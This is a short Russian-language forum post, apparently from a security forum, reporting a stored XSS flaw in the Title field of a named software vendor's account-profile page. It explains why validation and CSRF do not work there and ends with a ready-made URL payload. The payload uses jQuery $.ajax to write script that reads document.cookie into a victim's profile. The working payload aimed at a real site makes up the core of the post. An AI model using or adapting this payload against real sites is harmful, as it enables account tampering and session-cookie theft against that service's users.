27.11.2015, 23:51
|
|
Новичок
Регистрация: 27.11.2015
Сообщений: 1
С нами:
5506166
Репутация:
0
|
|
тиц/пр:550/6
url:https://www.veeam.com/account-edit-profile.html
Уязвимое поле - Title, но через инпут не записать, так как валидация. XSRF тоже не провести, так как xmlhttprequest.
Так что, если сам себе - подменяем запрос. Ну, а злоумышленник может записать жертве через пассивку -
Код:
https://www.veeam.com/inj.html";a="script";$.ajax(%7Btype:"POST",url:"/change_field/",data:"val=injectedalert(document.cookie);%7Cjob_description%7CR%2CSymbol%2CMax",dataType:"json",async:!1%7D);window.location="/account-edit-profile.html"
|
|
|